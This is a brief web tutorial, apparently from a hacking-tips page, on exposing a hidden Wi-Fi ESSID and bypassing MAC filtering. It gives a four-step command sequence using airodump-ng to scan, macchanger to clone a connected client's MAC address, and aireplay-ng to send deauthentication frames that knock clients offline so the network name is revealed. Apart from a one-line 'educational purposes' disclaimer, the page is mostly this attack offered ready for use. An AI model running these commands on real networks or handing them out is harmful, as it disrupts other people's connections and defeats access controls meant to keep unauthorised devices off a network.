How to find a hidden ESSID and avoid MAC filters

How to find a hidden ESSID and avoid MAC filters

Disclaimer: Everything on this site is for educational purposes and should not be used for evil.

You will need:

airodump-ng
aireplay-ng
macchanger

Tutorial:

airodump-ng wlan0
Choose a hidden network and a station
macchanger --mac=[STATION] wlan0
aireplay-ng -0 5 -a [BSSID of hidden network] wlan0
If you're lucky, you will get the ESSID on the first time. If not, retry the last command after some time.

Comments